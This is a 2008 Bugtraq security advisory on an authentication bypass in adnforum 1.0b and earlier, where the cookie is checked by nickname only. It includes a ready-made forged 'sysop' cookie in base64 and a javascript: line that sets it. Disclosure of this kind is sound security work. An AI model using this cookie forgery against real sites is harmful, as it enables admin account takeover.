adnforum <= 1.0b / Insecure Cookie Handling Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: adnforum <= 1.0b / Insecure Cookie Handling Vulnerability
- From: Pepelux <pepelux@xxxxxxxxxxxx>
- Date: Thu, 25 Sep 2008 19:32:16 +0200
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:sender :to:subject:mime-version:content-type:content-transfer-encoding :content-disposition:x-google-sender-auth; bh=JIoL/y3R2AFvJsT7z1yN+BeLgxm25AmZZeh7avLDEdI=; b=CHIC3JfZk/IzafKD6CMaAESibZgwoxHkxeWt2J++mbMFrwIr2A+LUkxL83rrcG841z y+ldPx5s3QizuigiJB5yxWU/MrO3FRNbfaU2WMXWYYruceSewSYtBQ/Ae34CcXcWBO14 lRl5008yCiQ2jE1E6PBNKEGdjR0FZM1NsXf0I=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:sender:to:subject:mime-version:content-type :content-transfer-encoding:content-disposition:x-google-sender-auth; b=QlaRftv5tjcwMas9j+owfZlBF2ZpBaqOdHyDF+xO1fkau3ASLqfO2JsSR2veFLeZfT hTu97jsuIrmxlWjuyD2O+qfGLulkppmEdiXlOM9Op9Pb8Q0zx0b0wf8VEg8g3cgog+bg NH5sc9TMrv69GL34hyBabrAoRH54sjMea7PFU=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
- Sender: pepeluxx@xxxxxxxxx
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
adnforum <= 1.0b / Insecure Cookie Handling Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
$ Program: adnforum
$ Version: <= 1.0b
$ File affected: index.php
$ Download: http://sourceforge.net/projects/adnforum/
Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org
Cookie is base64 based and the ascii format used is:
user:23ed4e45887ad4311ff654bd4aab6540:user:0
user:md5 pass:user:0
Programmer forgot to check the pass and only use the nick to autenticate
the user.
You can create a fake cookie likes this:
sysop:000000000000000000000000000000:sysop:0
In base64: c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA
Exploit:
javascript:document.cookie =
"fpusuario=c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA"